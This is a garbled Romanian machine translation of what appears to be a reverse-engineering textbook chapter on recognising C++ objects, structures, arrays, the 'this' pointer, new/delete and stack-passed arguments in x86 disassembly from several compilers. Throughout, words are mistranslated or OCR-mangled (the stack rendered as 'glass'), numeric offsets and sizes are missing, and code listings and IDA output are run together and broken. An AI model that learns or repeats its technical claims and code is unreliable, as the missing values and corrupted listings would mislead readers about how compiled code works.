de faptul că funcția publică este cauzată de alte obiecte și protejată -numai de obiectul său Acum vom lua în considerare toate aceste probleme mai detaliat Deci, un obiect (sau mai bine zis,o copie a obiectului) - ce este?Să avem următorul obiect (listarea ) Listarea Un exemplu care demonstreazăstructura obiectului din clasa MyClass {void Demo l (void);int a;int b;Public: Virtual void Demo (void);intc,-);Myclass Zzz;Instanța obiectului ZZZ va „schimba” compilatorul la următoarea structură (Fig ) Următoareleprobleme se confruntă cu cercetătorul: Cum să distingem obiectele de structuri simple?Cum se determină dimensiuneaobiectelor?Cum să determinați ce funcție la ce obiect aparține?Să începem să răspundem la întrebări înordine Orez Prezentarea unei instanțe a obiectului în memoria indicatorului de pe VTBL GPAV Identificareaobiectelor, structurilor și tablourilor Strict vorbind, este imposibil să distingem un obiect de structură datorităfaptului că obiectul este o structură cu membrii cu membrii , privat (privat) în mod implicit Când anunțați obiecte,puteți utiliza atât structura cheie a cuvintelor, cât și clasa de cuvinte cheie Mai mult decât atât, pentru clase, toțimembrii sunt deschiși, este de preferat să se utilizeze cu precizie structura, HAK ca membri ai structurii sunt dejaimplicit public Comparați următoarele două exemple (prospectul ) Listarea Clasele sunt structuri cu membriprivați în mod implicit struct MyClassf void Demo (void);int x;Privat: void derno private (void);int y;Class MyClass{void Demo private (void);int y;Public: Demo void (void);int x;O înregistrare diferă doar sintactic de celălalt, iarcodul generat de compilator va fi identic!Prin urmare, cu speranța de a învăța să distingem obiectele de structuri artrebui să fie despărțite cât mai curând posibil OK, ar trebui să luăm în considerare obiecte de structură care conținuna sau mai multe funcții, dar cum să determinăm ce funcție aparține obiectul?Totul este simplu cu funcțiile virtuale -sunt cauzate indirect, prin pointerul către tabelul virtual plasat de compilator în fiecare copie a obiectului din careface parte această funcție virtuală Funcțiile nevirtuale sunt cauzate de adresa lor reală, precum și de funcțiiobișnuite care nu aparțin niciunui obiect Situația este fără speranță?Nu în niciun caz!Un argument implicit estetransmis fiecărui membru funcțional al obiectului-indicatorul acestui lucru, referindu-se la copia obiectului din careaparține această funcție O copie a obiectului nu este însă obseul în sine, dar ceva foarte strâns legat de acesta, prinurmare, pentru a restabili structura inițială a obiectelor unui program DizAssemble este destul de reală Acest lucru vafi descris mai detaliat în acest capitol, în secțiunea „Obiecte și copii” Mărimea obiectelor este determinată de aceiașiindicatori ai acestui lucru - ca diferența dintre semnele vecine (dacă obiectele sunt localizate în stivă sau însegmentul de date) Dacă copiile obiectelor sunt create de noul operator (așa cum se întâmplă adesea), atunci codul esteplasat în codul care acceptă cantitatea de octeți alocați ca argument - aceasta este dimensiunea obiectului Asta, defapt, este totul Rămâne să adăugăm că mulți compilatori, creând o instanță a unui obiect care nu conține nici date, nicifuncții virtuale, încă disting cantitatea minimă de memorie (de obicei un octet), deși nu este utilizat în niciun fel Dece se face asta?La urma urmei, memoria este limitată, dar un octet nu se poate distinge de o grămadă - o piesă solidăeste „pensionată”, a cărei dimensiune variază de la octeți la kbytes (în funcție de implementarea mormanului însine) Motivul este că compilatorul este vital pentru a determina indicatorul acestui lucru - din păcate, din păcate, nupoate fi zero, deoarece acest lucru ar provoca o excepție la prima încercare de a face apel Da, iar operatorul deștergere trebuie să fie eliminat ceva, iar dacă așa este „ceva” trebuie să fie alocat mai întâi Toate acestea suntdeficiențe C ++, deși dezvoltatorii săi nu s -au săturat să repete că limba lor nu este inferioară în eficacitate pentruPure S Bine, toate acestea sunt versuri, vom trece la luarea în considerare a unor exemple specifice în listarea Prezentarea Un exemplu care demonstrează identificarea obiectului și structurii Listarea Un exemplu caredemonstrează identificarea obiectului și structurii #include clasa myclass { Partea III Identificareastructurilor cheie ale limbilor de nivel ridicat public: void Demo (void);int x;Privat: DEMO PRIVATE (void);int y;};Void myclass :: demo private (void) {printf ("private \ n");} VoidmyclassDemo (void) {printf ("myclass \ n");This-> demo private ();this-> y = x ;} Main () {myclass *zzz = newmyclass;Zzz-> demo ();zzz-> x = x ;Rezultatul compilării exemplului dat în lista , în cazul general, ar trebui săprivească așa cum se arată în lista w-the (y,-"-/; " • AF -LP PUSHESI PUSH Apel? A fost ceva de genul Char *x = new Char [ ]), deci; nu vom lua în considerare această afirmație decătre dogmă, dar vom accepta ca ipoteză de lucru; - vor arăta studii suplimentare CE ESTE CE Capitolul ,„Identificarea acestui lucru ” GPAVA IdentiIMENT de obiecte, structuri și tablouri ;claritate), dar se știe că aparține instanței obiectului, pe;Care este indicat de ECH, să numim această copie„A” Mai departe - pentru că;Funcția care provoacă demo (adică funcția în care suntem acum; noi) nu aparține „a” (eaînsăși a creat -o - nu ar putea; instanța obiectului în sine „scoate -se din păr”) , atunci funcția demo -;Aceasta esteo funcție publică Nu este rău pentru început?MOV DWORD PTR [ESI], H;Deci, deci ne amintim că ESI indică oinstanță a obiectului, atunci;Se dovedește că instalația are un alt membru public-o variabilă;TIP INT ;Conformconcluziilor preliminare, obiectul arăta astfel:- clasa myclass {;Public:;Demo void (void);// void - deoarece funcția nuacceptă nimic și nu;// se intoarce ;int x;Pop eSi Retn Main Endp Demo Proc în apropiere C de xref: main+fîp;Aici suntemîn funcția demo - un membru al obiectului A Push ESI Mov ESI, ECX;Încărcăm în ECX - indicatorul acestei funcțiitransmise Push Offset Amyclass;„MyClass \ n” Call Printf Add ESP, ;Afișăm linia de pe ecran acest lucru nu esteinteresant, dar apoi Mov ECX, ESI Call Demo Private;O altă funcție se numește!Judecând după aceasta, aceasta estefuncția noastră;obiect și, cel mai probabil, având un atribut privat;Deoarece este numit doar din funcția obiectului însine Mov dword ptr [ESI+ ], H;Deci, există o altă variabilă în obiect, probabil privată Atunci, ;Conform opiniilormoderne, obiectul ar trebui să arate astfel :;Class myclass {;Void DEMO PRIVATE (void);;int y;Public:;Demo void(void);// void - deoarece funcția nu este nimic;// acceptă și nu se întoarce ;int x;Deci, nu numai că am identificatobiectul, dar chiar am restabilit structura sa!Lasă -l, nu este asigurat de erori (deci, asumarea vieții private ademo private și se bazează doar pe faptul că nu au fost niciodată chemați din exteriorul obiectului), dar totuși - nuatât de înfricoșător, Partea a III -a Identificarea structurilor cheie ale limbilor de nivel ridicat;cum este pictatși restabilit, dacă nu un text sursă autentic;Programe, atunci cel puțin un fel de aparență este foarte posibil „Pop ESIRetn Demo Endp Demo Private Proc în apropiere;C DF XREF;Demo-tl ope;Funcție demo privată - Nimic interesant Push OffsetAprivate;„Privatexn” Call Printf Pop Ecx Retn Demo Private Endp Obiecte și copii într -un cod generat de o compilare, nuexistă obiecte - doar copii ale obiectelor La prima vedere, pare nesemnificativ Cui ii pasa?Obiectul obiectului esteobiectul în sine?Nu, există o diferență fundamentală între obiect și copie Obiectul este o structură, în timp ce oinstanță a obiectului (în codul generat!) - substructura acestei structuri Adică să aibă un obiect A, inclusiv funcțiileA;și a Mai departe, să fie create două dintre copiile sale - de la una pe care o numim funcția a;, de la celălalt -a Folosind acest indicator, putem afla doar că o copie aparține funcției a; și cealaltă - a Dar este imposibil destabilit dacă aceste exemplare sunt copii ale aceluiași obiect sau copii ale două obiecte diferite!Situația esteagravată de faptul că, în clasele derivate, funcțiile moștenite nu sunt duplicate (în orice caz, acesta este ceea cecompilatorii „deștepți” fac acest lucru, deși totul se întâmplă în viață) Există ambiguitate - dacă funcțiile A suntasociate cu o singură copie;și a , și cu altul - al a și AJ, atunci poate fi fie copii ale aceleiași clase (doar din prima copie, funcția A nu este numită), fie a doua copiepoate fi o copie a clasei derivată din prima Codul generat de compilator în ambele cazuri va fi identic!Este necesar sărestabiliți ierarhia claselor în sens și scopul funcțiilor lor Desigur, doar un clarvăzător poate reproduce codul sursăcel puțin aproximativ Într -un cuvânt, fie că poate, nu confunda niciodată un obiect al obiectului cu obiectul în sineși nu uitați că obiectele există doar în textul original și sunt distruse în stadiul de compilare Adresa mea nu este ocasă sau o stradă unde sunt „trăiesc” structurile, tablourile și obiectele?Desigur, în memorie!Și altele?Mai precis:Există trei tipuri de plasare: în stivă (memorie automată), segmentul de date (memorie statică) și în grămadă (memoriedinamică) Și fiecare tip cu propriul „caracter” ia stiva - alocarea memoriei este o implicită, care are loc de fapt înstadiul de compilare și numai memoria totală este garantată pentru a determina, alocat pentru toate variabilele localeși determinați: cât de mult fiecare dintre ei ocupă este imposibil în principiu Nu crede?Dar să zicem, să fie un astfelde cod: char al [ ];Char A [ J;Char A [ Dacă nivelul compilatorului se referă la mai multe adrese (și multecompilatoare fac acest lucru), atunci diferența de deplasare a celor mai apropiate tablouri unul de celălalt poate să nufie egală cu dimensiunea lor Singura speranță de a restabili dimensiunea autentică este de a găsi în verificările de codpentru ieșirea dincolo de limitele tabloului (dacă sunt, pentru că de multe ori nu se întâmplă) Al doilea (cel maineplăcut) - dacă unul dintre tablouri nu este utilizat, ci doar declarat, atunci compilatoarele care nu sunt optimizante(și chiar unele optimizante!) Cu toate acestea, pot ocupa un spațiu de sticlă pentru asta El se va alăturaîndeaproapelor anterioare și apoi rămâne doar să ghicească - fie dimensiunea tabloului este una, fie la sfârșitul său„este„ injectată ”un tablou neutilizat?Ei bine, încă nu exista nicio cale spre tablouri, dar lucrurile sunt mult mairele cu structurile și obiectele Nu s -a întâmplat niciodată nimănui să plaseze capitolul Identificarea obiectelor,structurilor și tablourilor în program, care monitorizează ieșirea dincolo de structură(obiect) Acest lucru este imposibil în principiu (bine, cu excepția faptului că programatorul funcționează prea liber cusemne)!Bine, să lăsăm deoparte dimensiunea, să trecem la problemele „scanării” și la căutarea semnelor Așa cum ammenționat deja anterior, dacă un tablou (obiect, structură) este declarat în zona imediată a vizibilității unei unitățide difuzare, este „sfâșiată” în faza de compilare și apelează la membrii săi în funcție de deplasarea efectivă , și nuconform indicatorului de bază Din fericire, identificarea obiectelor facilitează prezența unui indicator în ele la untabel virtual, dar nu un fapt că orice tabel de indicatori din funcție este un tabel virtual!Poate că acesta este doar oserie de indicatori pe funcțiile determinate de programator în sine?De fapt, dacă există experiență, astfel de situațiipot fi ușor recunoscute , dar totuși sunt destul de neplăcute Lucrurile sunt mult mai ușoare cu obiectele situate înmemoria statică - datorită globalității lor, au un steag special care împiedică o provocare repetată a proiectantului ,astfel încât să distingem o copie a obiectului localizat în segmentul de date sau tablou devine foarte ușor Cu definițiadimensiunii sale, însă, toate aceleași inconsecvențe În cele din urmă, obiecte (structuri, tablouri) localizate într -ogrămadă - doar un basm pentru analiză!Solicitarea memoriei este realizată de o funcție care ia în mod clar o anumităcantitate de octeți alocați ca argument și un indicator de întoarcere, care este garantat să indice începutul uneiinstanțe a obiectului (structură, tablou) De asemenea, este mulțumit că apelul la elemente are loc întotdeauna prinindicatorul de bază, chiar dacă anunțul este făcut în domeniul vizibilității (nu poate fi altfel - adresele reale aleblocurilor alocate de memorie dinamică nu sunt cunoscute la compilare etapă) Această problemă a fost discutată încapitolul , „Identificarea funcțiilor virtuale”, această problemă a fost discutată în capitolul , „Identificareaproiectantului și a distrugătorului” Capitolul Identificarea acestui lucru, această „cheie de aur” sau, dacă doriți,,Cercul de salvare „, care permite să nu se înece în oceanul furtunos al OOP Datorită acestui fapt, este posibil să sestabilească apartenența funcției cauzate la o anumită instanță a obiectului Deoarece toate funcțiile non -virtuale aleobiectului sunt cauzate direct - la adresa reală, obiectul este, așa cum a fost, „împărțit” în funcțiile care alcătuiescfuncțiile sale chiar și în stadiul de compilare Dacă nu ar exista acest indiciu - ar fi fundamental imposibil sărestabiliți ierarhia funcțiilor!Astfel, identificarea corectă a acestui lucru este foarte importantă Singura problemăeste să o distingem cu exactitate de la indicatori la tablouri și structuri Într -adevăr, identificarea obiectului obiectului este realizată în funcție de indicatorul acestui lucru (dacămemoria alocată este indicată de aceasta, aceasta este o instanță a obiectului), cu toate acestea, de definiția în sine,indicatorul se referă la Divertismentul obiectului Cercul vicios Din fericire, există o singură lacună codul caremanipulează acest indicator este foarte specific, ceea ce vă permite să distingeți acest lucru de toate celelaltesemne De fapt, fiecare compilator are propria „scriere de mână”, care este recomandat să studieze, dizassembgingpropriile sale programe scrise pe C ++ Cu toate acestea, există recomandări universale aplicabile majoritățiiimplementărilor Întrucât acesta este un argument implicit al fiecărei clase de clasă, este logic să amâne conversațiadespre identificarea acesteia la capitolul , „Identificarea argumentelor funcțiilor” Aici vom oferi doar un scurtrezumat al acestui mecanisme de transmisie cu diverse compilatoare (tabelul ) Tabelul Mecanismul de transmiterea indicatorului în funcție de implementarea compilatorului și de tipul de compilator de funcții Defult I FastCall CdeclI stdcall Pascal Microsoft Visual C ++ Ech prin funcția de sticlă a funcției primului argument al Borland C + + EAXWATCOM cu capitolul Identificarea operatorilor noi și ștergeți și ștergeți sunt traduse de un compilator în apelurilefuncțiilor bibliotecii, care pot fi recunoscute în același mod ca și funcțiile obișnuite ale bibliotecii Recunoașteautomat funcțiile bibliotecii, în special, IDA RGO Dizassembler, eliminând această preocupare de pe umeriiutilizatorului Cu toate acestea, nu toată lumea are un Ida RGO și departe de a fi întotdeauna la momentul potrivit estela îndemână În plus, nu toate funcțiile de bibliotecă sunt cunoscute pentru acest Dizassembler și, în special, nou șiștergere nu sunt întotdeauna recunoscute corect Cu alte cuvinte, există o mulțime de motive pentru identificareamanuală Implementarea noilor și a ștergerii poate fi oricare, dar cea mai mare parte realizează rareori funcțiile de alucra cu o grămadă de unul singur Și de ce faceți acest lucru, pentru că este mult mai ușor să apelați la serviciilesistemului de operare Cu toate acestea, este naiv să aștepți în loc de noul apel Heapalloc și, în loc de ștergere,HeapFree Nu, compilatorul nu este atât de simplu!Operatorul de știri este difuzat în funcția de știri, ceea ce face cafuncția Malloc să evidențieze memoria, Malloc, la rândul său, se adresează Heap alloc -A tip de „înveliș” cu acelașinume prin Win al procesului Imaginea cu eliberarea memoriei este similară Identificarea noului pentru a se aprofundaîn jungla apelurilor cuibărite este prea obositoare Este posibil să se identifice operatorii noi și ștergeți într -unalt mod, cu costuri de muncă mai mici și fără dureri de cap inutile?Sigur ca poti!Să ne amintim tot ceea ce știm desprenou: □ Noul acceptă singurul argument - numărul de octeți ai memoriei eliberate, iar acest argument în marea majoritatea cazurilor este calculat chiar și în stadiul de compilare, adică este o constantă □ Dacă obiectul nu conține nicidate, nici funcții virtuale, atunci dimensiunea acestuia este egală cu una (unitatea de memorie minimă izolată numaipentru a indica ce să indice indicatorul acestui lucru) Prin urmare, veți întâmpina o mulțime de provocări precum PushOxCall XXX, unde XXX este noua adresă!În general, dimensiunea tipică a obiectelor este mai mică de o sută de octeți -Căutați funcția adesea cauzată, cu un argument-tank, a cărui dimensiune este mai mică de o sută de octeți □ Funcțianouă este una dintre cele mai „populare” funcții de bibliotecă - căutați o funcție cu un număr mare de legăturiîncrucișate □ Cea mai caracteristică caracteristică: Noua returnează acest indicator, iar acest lucru este foarte ușorde identificat chiar și cu vizionarea cursivă Mai detaliat, această problemă va fi luată în considerare în capitolul , „Identificarea funcțiilor bibliotecii” Implementarea Heap alloc depinde de implementarea bibliotecii de lucru cumemoria, care va fi descrisă mai târziu în acest capitol în secțiune „Abordări pentru implementarea unei grămezi” ,Capitolul , „Identificarea acestui lucru” este dedicată acestei probleme Partea a III -aIdentificarea structurilor cheie ale limbilor de nivel înalt □ Rezultatul returnat la nou este întotdeauna verificatpentru egalitatea zero Dacă acest rezultat este într -adevăr zero, atunci designerul (dacă există) nu esteapelat Astfel, „ziua de naștere” a știrilor are mai mult decât suficient pentru identificarea rapidă și fiabilă Singurullucru de reținut: Noul este folosit nu numai pentru a crea noi exemplare de obiecte, ci și pentru a evidenția memoriapentru tablouri (structuri) și ocazional pentru variabile solitare (de exemplu, puteți găsi structuri precum int *x =new Int, care În general vorbind, absurd, dar unii o fac) Din fericire, este foarte simplu să distingem o situațieîn care sunt folosite știri pentru a evidenția memoria - nici în tablouri, nici structuri, nici variabile unice Polister asta!Pentru a ilustra cele doar spuse, luați în considerare un fragment din codul generat de compilatorulWATCOM (listarea ) Acest compilator a fost ales deoarece IDA Pro nu își recunoaște implementarea „autohtonă” denouă Listarea într -un fragment #include stat xt {char so [ ];int x;};Void myfunk (dublu a, struct xt xt)(printf ("%f,%x,%s \ n", a, xt x, & xt so [ ]),} main () struct xt; strcpy (& Xt so [ ], "Bună ziua, lume!"); Xt x = x ; myfunk ( , xt); rezultatul compilației sale de compilare Microsoft Visual C ++ cu setări implicite arată așacum se arată în lista Lista , Rezultatul compilării exemplului dat în lista folosind Microsoft Visual C++ Main Proc apropiat; Code Xref: Start+AF^P VAR H - H VAR = DWORD PTR - PUSH EBP EBP EBP, ESP Sub, esp Sub Esp, H; Prima apăsare se referă clar la funcția funcției și nu la transmisie; argumente Împingeți ESI Push edi; lipsainițializării evidente a registrelor sugerează că, mai degrabă, acestea sunt acestea Pur și simplu păstrate în stivă șinu sunt transmise ca argumente Cu toate acestea, dacă argumentele au fost transmise acestei funcții nu numai prin;stivă, ci și prin registrele ESI și EDI, atunci trimiterea lor la stivă poate fi bine;Lloworld;"Salut Lume '";Da, șiaici există în mod clar o transmisie a argumentului - indicatorul de pe;linia Deși teoretic este posibil să se păstrezetemporar constanta B;Staba pentru împingerea sa ulterioară într-un registru, strict vorbind, se presupune că se vede căvedeți capitolul , „Identificarea constantelor și a deplasărilor” GPAVA Identificarea argumentelor funcțiilor ;sau apelul direct la stivă, nu unul dintre cei cunoscuți;Compilatoarele nu sunt capabile de astfel de trucuri șitrimiterea de constante în stivă;Este întotdeauna un argument transmis LEA EAH, [EBP+VAR ];În EAH, un indicator esteintrodus la bufferul local Push EAH;EAH (indicatorul către tamponul local) este păstrat în stivă ;Deoarece o serie deargumente sunt continue, apoi după recunoașterea primului;Nu există nici o îndoială argumentul potrivit căruia toatederivările ulterioare ale ceva;Fără stivă - de asemenea argumente Sunați Strcpy;Prototipul funcției Strcpy (char *, char*) nu permite determinarea;Procedura pentru introducerea argumentelor, cu toate acestea, deoarece toate bibliotecaC-;Funcțiile urmează acordul CDECL, apoi argumentele sunt introduse în dreapta;În stânga, codul sursă arăta astfel:Strcpy (& Buff [ ], "Hello, World!") ;Dar, poate, programatorul a folosit transformarea, să zicem, c;Stdcall?Este extremde puțin probabil - pentru aceasta ar fi necesar;Crosspill și funcția Strcpy în sine - altfel cum știa ea ,;că procedurapentru introducerea argumentelor s -a schimbat?Deși de obicei standard;Bibliotecile sunt livrate cu textele inițiale,compilarea lor încrucișată;Aproape nimeni nu angajat Adăugați ESP, ;Turnați octeți din Stack Din aceasta concluzionăm că funcțiile;Două cuvinte de argumente alemașinii au fost transmise și, prin urmare, împing ESI;și Push EDI nu au fost argumentele funcției MOV [EBP+VAR ], H;Aducem x la variabila locală Aceasta este în mod clar o constantă, a;Nu un indicator, deoarece ferestrele dinaceastă zonă nu pot fi stocate;Fără date de utilizator Sub esp, h;Rezervarea memoriei pentru o variabilătemporară Variabile temporare;În special, acestea sunt create atunci când transmit argumente prin sens, prin urmare,;Vom fi gata pentru următorul „tovarăș” - argument Mov Ech, ;Aducem la constanta ESC x Nu se știe încă de ce LeaESI, [EBP+VAR ];Încărcăm indicatorul în ESI la tamponul local care conține;Linia copiată „Hello, World ” Mov edi,esp;Copiați în indicatorul EDI în partea de sus a stivei Repe MOVSD;Aici este - transmiterea liniei prin sens Linia estecopiată în întregime;Stack, mâncând de la el * octeți ;)Identificarea structurilor cheie ale limbilor de nivelridicat;Prin urmare, acest argument ocupă ( x ) octeți de pahar;Spațiu - Această cifră ne va fi utilă atunci cânddeterminăm cantitatea;Argumente pentru numărul de byte turnând ;Datele de la [ebp+var ] la [ebp+var - x ),adică sunt copiate în stivă;De la ѵag la ѵag Dar până la urmă, ѵAG conține x constant ,;Prin urmare, va fitransmisă funcțiilor cu linia ;Acest lucru ne permite să recreăm structura inițială :;Struct x {;Char s [ ] int x;unu;Da, funcțiile sunt eliberate, structura este transmisă și nu o linie Line Push AA D H PUSH A D A H;Aducem încădouă argumente în stivă Cu toate acestea, de ce exact doi ;Poate fi un argument precum Int sau dublu ;Pentru adetermina ce cod exact nu este reprezentat de cod;posibil ;Îl amânăm pentru mai târziu - înainte de a studia abordareaargumentelor din stivă ;Între timp, va trebui să ajungeți în incertitudinea completă a ADD ESP, H;Turnați x BYTE Din moment ce de octeți ( x ) se încadrează;Structura și octeți - Pe următoarele două argumente,obținem; x + x = x , ceea ce a fost necesar să demonstreze Pop edi pop esi mov esp, ebp pop ebp retn sub endpahelloworld db 'hello, world ', align ;DATA XREF: Sub + ó Rezultatul compilării aceluiași exemplu de cătrecompilatorul Borland C ++ va fi ușor diferit și destul de instructiv Luați în considerare (listarea ) Lista Rezultatul compilării exemplului dat în lista , folosind • Borland C ++ Main Proc în apropiere decompilator Date xref: date: > lo var = byte ptr - h var = dwordptr - push ebp cpava identificareafuncțiilor mov ebp, esp Adăugare esp, fffffe h;Da!Acesta este un semnminus Faceți clic pe Ida și obțineți;Adăugați esp, - h Push ESI Push edi;Până acum, totul merge ca în cazulanterior Mov ESI, Offset Ahelloworld;„Bună ziua, lume ”;Și aici încep diferențele!Pur și simplu nu există niciun apelstrcpy ;Mai mult, compilatorul nici măcar nu a desfășurat funcția;Înlocuindu -l la locul apelului, dar pur și simplu aexclus apelul în sine!Lea edi, [EBP+VAR ];Intrăm un indicator la tamponul local în EDI MOV EAX, EDI;Aducem acelașiindicator în EAX Mov ecx, repetare movsd movsb;Vă rugăm să rețineți: * + = octeți sunt copiați Treisprezece, șideloc;Douăzeci, după cum urmează din declarația structurii Acesta este compilatorul ca acesta;a optimizat codul, copiinddoar linia către tampon și ignorându -l;Nu inițializată „coada” MOV [EBP+VAR ], H;Aducem x la variabilalocală PUSH AA D H PUSH A D A H;În mod similar Nu putem determina: care sunt aceste două numere -;unul sau douăargumente LEA ECX, [EBP+VAR ];Aducem un indicator la începutul liniei în ES Mov edx, ;Aducem constanta la EDX (încănu este clar de ce) LOC D : C de xref: mam+ > lj push dword ptr [ecx+edx* ];Ce este acest cod de coșmar?Să negândim, începând să -l învârt;De la sfârșit În primul rând - ce este ECX+EDX* ?Ech - pointer;la tampon și, cu aceasta,totul este clar, dar Edx* == * == ;Da, înseamnă că obținem un indicator nu la începutul liniei, ci până lasfârșit;Mai degrabă, nici măcar la sfârșit, ci la variabila EBP+VAR ( x - x = x ) ;Să ne gândim - dacă acesta esteun indicator pentru ѵag , atunci de ce să -l calculăm;Într -un mod atât de complicat?Cel mai probabil, avem de -a facecu structura ;În continuare - Vezi, echipa Push trimite un cuvânt dublu în pahar ,;stocat conform acestui pointer decedx;Reducem EDX Ați simțit deja că avem de -a face cu ciclul?JNS Short LOC D PARTEA III Identificareastructurilor cheie Limbi cu nivel înalt;Iată această tranziție care nu este un număr negativ care este declanșat;confirmă asumarea cicluluinostru ;Da, un astfel de design pervertit al Borland transferă argumentul -;structura valorii valorii apeleazămyfunk;Apelarea funcției uite - nu există nicio stivă de curățare Da, acesta este ultimul;Funcția cauzată șicurățarea stivei nu este necesară -;Borland nu o efectuează Hog eah, eah;Khuls a rezultatului prezentat defuncție Borland face acest lucru cu;Funcțiile void-acestea revin întotdeauna zero, mai precis: nu ei;Întoarcerea șicodul plasat în spatele apelului lor, Zeroing EAX Pop edi pop esi;Restaurăm registrele EDI și ESI salvate anterior MovEsp, EBP;Restaurăm ESI - de aceea stiva nu a fost curățată după un apel;Ultima funcție!POP EBP Retn Main Endp Acordatatenție - În mod implicit, Microsoft C ++ transferă argumente de la dreapta la stânga, și Borland C ++ de la stânga ladreapta!Printre tipurile standard de apeluri, nu există nimeni care, care transmite argumente de la stânga la dreapta,ar încredința curățarea stivei ca funcție sfidătoare!Se dovedește că Borland C+T folosește propriul său tip de apelincompatibil!Adresarea argumentelor din stivă este conceptul de bază al stivei include doar două operații - elementulcare intră în stivă și eliminarea ultimului element adus acolo Accesul la un element arbitrar este ceva nou!Cu toateacestea, o astfel de retragere din canoane crește semnificativ viteza muncii - dacă aveți nevoie, să spunem, al treileaelement, de ce să nu -l scoateți din stivă direct, fără a elimina primele două?Stack nu este doar o „stivă”, așa cumînvață manualele de programare populare, ci și un tablou Și dacă da, atunci, știind poziția indicatorului din partea desus a stivei (și nu o știm, altfel unde puteți comanda următorul element?) Și dimensiunea elementelor, vom putea calculadeplasarea deplasării oricare dintre elemente, după care nu va fi dificil să -l citești Pe parcurs, observăm unul dintredefectele stivei - ca orice alt tablou omogen, Stack poate stoca date dintr -un singur tip, de exemplu, cuvinteduble Dacă trebuie să aduceți un octet (să spunem, un argument al tipului de tip), atunci trebuie să -l extindeți la uncuvânt dublu și să -l aduceți în pahar în întregime În mod similar, dacă argumentul ocupă patru cuvinte (dublu, INT ),atunci sunt cheltuite două elemente de sticlă pentru transferul său!În plus față de transmiterea argumentelor, stivaeste folosită și pentru a păstra adresa de întoarcere din funcție, care necesită, în funcție de tipul de apelare afuncției (aproape sau departe), de la unu la două elemente Apelul apropiat (Peague) este valabil în cadrul unui segment- în acest caz, este suficient să păstrați doar deplasarea echipei în urma instrucțiunilor de apel Dacă funcțiasfidătoare este într -un segment, iar cea cauzată în alta, atunci pe lângă deplasare, trebuie să vă amintiți segmentulîn sine pentru a ști unde să transferați controlul la întoarcerea Deoarece adresa de întoarcere este introdusă dupăargumente, argumentele GPAV sunt relative la partea de sus a stivei Identificarea argumentelor funcțiilor este„pentru” de către el, iar deplasarea lor variază în funcție de numărul de sticlă elemente ocupate de adresa deîntoarcere Din fericire, modelul plat al memoriei Windows vă permite să uitați de modelele de memorie ca un vis teribilși să folosiți doar provocări apropiate peste tot Compilatoarele care nu sunt optimizante folosesc un registru special(de obicei HEB) pentru a aborda argumente, copiind valoarea stivei de vârf a vârfului chiar de la începutulfuncției Deoarece sticla crește de la adresele mai vechi la cele mai tinere, deplasarea tuturor argumentelor (inclusivadresa de retur) este pozitivă, iar deplasarea N-RO este calculată conform următoarei formule: arg offset =n*size element+size return address unde n n este numărul argumentului, numărătoare din partea de sus a stivei(numărătoarea inversă începe de la zero), size element - dimensiunea unui element de stivă, în cazul general egal cudescărcarea segmentului (pentru Windows x/NT - patru octeți) , size return address - dimensiunea octeților ocupați deadresa de retur (sub Windows X/NT - de obicei patru octeți) Adesea, trebuie să rezolvați problema inversă: cunoaștereadeplasării elementului, determinați ce fel de argument se întâmplă argumentul Următoarea formulă ne va ajuta cu acestlucru, care este elementar din precedentul: arg offset-size return address n = Size element De când înainte de a copia valoarea curentă a ESP, vechea hebus trebuiemenținută în aceeași stivă, trebuie Faceți o modificare în formula dată, adăugând dimensiunea adresei de retur aRegistrului de HEB (BP în modul pe biți, în cazul în care va trebui să dizassembel astfel de programe) Din punctul devedere al hackerului, principalul avantaj al unei astfel de abordări a argumentelor este că, văzând undeva în mijloculcodului, instrucțiuni precum Moch Eah, [Heb+Svyu], puteți calcula instantaneu care exact Se întâmplă argumentul Cu toate acestea, optimizarea compilatorilor pentru salvarea registrului, Herahs abordeazăargumentele direct prin ESP Diferența este fundamentală!Valoarea ESP nu rămâne constantă în timpul executării funcțieiși se schimbă de fiecare dată când introduceți date în stivă și când acestea sunt eliminate de acolo Prin urmare, nuexistă nicio constantă și deplasare a argumentelor cu privire la ESP Acum, pentru a determina ce fel de argument esteapelul, este necesar să știm: cu ce ESP este egal cu acest punct al programului și pentru a clarifica acest lucru, toateschimbările sale trebuie monitorizate de la începutul functia!Vom vorbi mai multe despre o astfel de adresare „vicleană”în capitolul , „Identificarea variabilelor de sticlă locală” și, mai întâi, vom reveni la exemplul anterior și vomanaliza funcția cauzată (lista ) ;Lista Codul dezasamblat al funcției MyFunc numite (vezi Lista ) MyfunkProc în apropiere C DE XREF Main+ Speed ​​Arg = DWORD PTR arg = DWORD PTR OCH arg = byte ptr loh arg lc =dword ptr h;IDA a recunoscut patru argumente transmise Cu toate acestea, nu merită;Ai încredere în acest lucrunecondiționat - dacă un argument (de exemplu, Int );Este transmis în mai multe cuvinte ale mașinii, Ida nu o va lua înmod greșit;unul și pentru mai multe argumente ;Prin urmare, rezultatul obținut de IDA trebuie interpretat după cumurmează: Funcții;Cel puțin patru argumente sunt transmise Cu toate acestea, aici nu totul este neted ;La urma urmei,nimeni nu interferează cu funcția cauzată de a urca în paharul mamei;Departe, după cum vrea ea, nu poate fi transferatla noi niciun argument partea a III -a Identificarea structurilor cheie ale limbilor de nivel ridicat;Deloc, și amurcat în mod arbitrar în stivă și am tras ceva de acolo Deși este;Se întâmplă în principal din cauza erorilorprogramatice din cauza confuziei C;Prototipuri, este necesar să luați în considerare o astfel de oportunitate (Într -ozi, oricum, întâlnește -te, așa că fii pregătit) Numărul care stă după;„Arg”, exprimă deplasarea argumentului în raportcu începutul cadrului stivei ;Vă rugăm să rețineți: cadrul Steki în sine este schimbat de opt octeți în raport cu Evv-;Patru octeți ocupă o adresă de întoarcere salvată, iar încă patru continuă;Conservarea Evvului Registrului Push EBPMOV EBP, ESP LEA EAX, [EBP+arg ];Obținerea unui indicator la argument ;Atenție: este tocmai indicatorul către argumentși nu referința argumentului ”;Acum ne vom da seama - la ce argument obținem un pointer ;IDA a calculat deja că acestargument este schimbat de opt octeți;În ceea ce privește începutul cadrului stivei În original, expresia închisăîn;Parantezele arătau ca EBP+Oxlo - deci majoritatea reflectă -o;DizAssemblers Dacă Ida ar fi atât de inteligentă, ar fitrebuit să fie constant;luați manual opt octeți din fiecare astfel de expresie vizată;(Cu toate acestea, suntem încăîngrijorați de acest lucru) ;Este logic: în partea de sus a ceea ce am pus în stivă în ultima tură ;Ne uităm la funcțiasfidătoare-ce am pus?;(Vezi opțiunea, compilat Microsoft Visual C ++) ;Da, ultimele au fost cele două argumente deneînțeles și în fața lor în stivă;A fost trimisă o structură formată dintr -o linie și un tip variabil INT ;Astfel,EBP+arg indică linia PUSH EAH;Trimitem indicatorul rezultat la stivă ;Se pare că este transmis la următoareafuncție Mov ech, [ebp+arg 